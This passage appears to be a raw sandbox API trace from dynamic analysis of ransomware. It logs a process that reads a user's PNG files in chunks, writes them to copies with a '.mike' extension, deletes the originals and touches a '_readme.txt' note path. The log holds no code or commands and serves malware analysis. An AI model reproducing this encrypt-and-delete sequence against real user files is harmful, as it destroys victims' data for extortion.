HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.918] GetFileType (hFile=0x1c8) returned 0x1 [0154.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.918] GetFileType (hFile=0x1c8) returned 0x1 [0154.919] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0154.919] ReadFile (in: hFile=0x1c8, lpBuffer=0x22bfc18, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22bfc18*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0154.919] CloseHandle (hObject=0x1c8) returned 1 [0154.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.920] GetFileType (hFile=0x1c8) returned 0x1 [0154.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.920] GetFileType (hFile=0x1c8) returned 0x1 [0154.920] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0154.920] WriteFile (in: hFile=0x1c8, lpBuffer=0x22ca180*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x22ca180*, lpNumberOfBytesWritten=0x2af04c*=0x2800, lpOverlapped=0x0) returned 1 [0154.921] CloseHandle (hObject=0x1c8) returned 1 [0154.921] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.921] GetFileType (hFile=0x1c8) returned 0x1 [0154.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.921] GetFileType (hFile=0x1c8) returned 0x1 [0154.921] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x2800 [0154.921] ReadFile (in: hFile=0x1c8, lpBuffer=0x22cccb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22cccb8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0154.921] CloseHandle (hObject=0x1c8) returned 1 [0154.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.922] GetFileType (hFile=0x1c8) returned 0x1 [0154.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.922] GetFileType (hFile=0x1c8) returned 0x1 [0154.922] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x2a20 [0154.922] WriteFile (in: hFile=0x1c8, lpBuffer=0x22d7220*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x22d7220*, lpNumberOfBytesWritten=0x2af04c*=0x2800, lpOverlapped=0x0) returned 1 [0154.922] CloseHandle (hObject=0x1c8) returned 1 [0154.923] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.923] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.923] GetFileType (hFile=0x1c8) returned 0x1 [0154.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.923] GetFileType (hFile=0x1c8) returned 0x1 [0154.923] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x5000 [0154.923] ReadFile (in: hFile=0x1c8, lpBuffer=0x22d9d58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22d9d58*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0154.923] CloseHandle (hObject=0x1c8) returned 1 [0154.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.924] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.924] GetFileType (hFile=0x1c8) returned 0x1 [0154.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.924] GetFileType (hFile=0x1c8) returned 0x1 [0154.924] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x5220 [0154.924] WriteFile (in: hFile=0x1c8, lpBuffer=0x22e42c0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x22e42c0*, lpNumberOfBytesWritten=0x2af04c*=0x2800, lpOverlapped=0x0) returned 1 [0154.924] CloseHandle (hObject=0x1c8) returned 1 [0154.924] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.924] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.925] GetFileType (hFile=0x1c8) returned 0x1 [0154.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.925] GetFileType (hFile=0x1c8) returned 0x1 [0154.925] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x7800 [0154.925] ReadFile (in: hFile=0x1c8, lpBuffer=0x22e6df8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22e6df8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0154.925] CloseHandle (hObject=0x1c8) returned 1 [0154.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.926] GetFileType (hFile=0x1c8) returned 0x1 [0154.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.926] GetFileType (hFile=0x1c8) returned 0x1 [0154.926] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x7a20 [0154.926] WriteFile (in: hFile=0x1c8, lpBuffer=0x22f1360*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x22f1360*, lpNumberOfBytesWritten=0x2af04c*=0x2800, lpOverlapped=0x0) returned 1 [0154.970] CloseHandle (hObject=0x1c8) returned 1 [0154.970] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.971] GetFileType (hFile=0x1c8) returned 0x1 [0154.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.971] GetFileType (hFile=0x1c8) returned 0x1 [0154.971] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0xa000 [0154.971] ReadFile (in: hFile=0x1c8, lpBuffer=0x22f3e98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22f3e98*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0154.971] CloseHandle (hObject=0x1c8) returned 1 [0154.972] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", lpFilePart=0x0) returned 0x7b [0154.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.972] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.973] GetFileType (hFile=0x1c8) returned 0x1 [0154.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.973] GetFileType (hFile=0x1c8) returned 0x1 [0154.973] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0xa220 [0154.973] WriteFile (in: hFile=0x1c8, lpBuffer=0x2101dcc*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x2101dcc*, lpNumberOfBytesWritten=0x2af04c*=0x2800, lpOverlapped=0x0) returned 1 [0154.973] CloseHandle (hObject=0x1c8) returned 1 [0154.973] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", lpFilePart=0x0) returned 0x76 [0154.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0154.974] GetFileType (hFile=0x1c8) returned 0x1 [0154.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.974] GetFileType (hFile=0x1c8) returned 0x1 [0154.974] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0xc800 [0154.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.977] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.977] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0154.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0154.981] WriteFile (in: hFile=0x1c8, lpBuffer=0x2133efc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2133efc*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0154.981] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", lpFilePart=0x0) returned 0x7b [0154.982] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0154.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0154.982] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png.mike", lpFilePart=0x0) returned 0x7b [0154.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0154.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0154.983] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png", dwFileAttributes=0x80) returned 1 [0154.983] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\gYO-l-JpXBy3mKQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\6onzwn8piewfkyh7zz\\3bim98xncehgqhkkbpx\\gyo-l-jpxby3mkq.png")) returned 1 [0154.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0154.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0154.986] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\_readme.txt", lpFilePart=0x0) returned 0x6e [0154.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefd8) returned 1 [0154.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefd4) returned 1 [0154.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0154.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0154.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0154.989] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0154.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0154.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0154.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0154.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0154.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0154.990] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\yQREJ0DYQ_biQRQz.png.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\yQREJ0DYQ_biQRQz.png.mike", lpFilePart=0x0) returned 0x7c [0154.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0154.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0154.991] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\yQREJ0DYQ_biQRQz.png", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\3biM98XncEHgqHKkbpX\\yQREJ0DYQ_biQRQz.png", lpFilePart=0x0) returned 0x77 [0154.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0154.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0154.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0154.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0154.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0154.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0154.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0154.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0154.999] SetThreadErrorMode (dwNewMode=0x0, 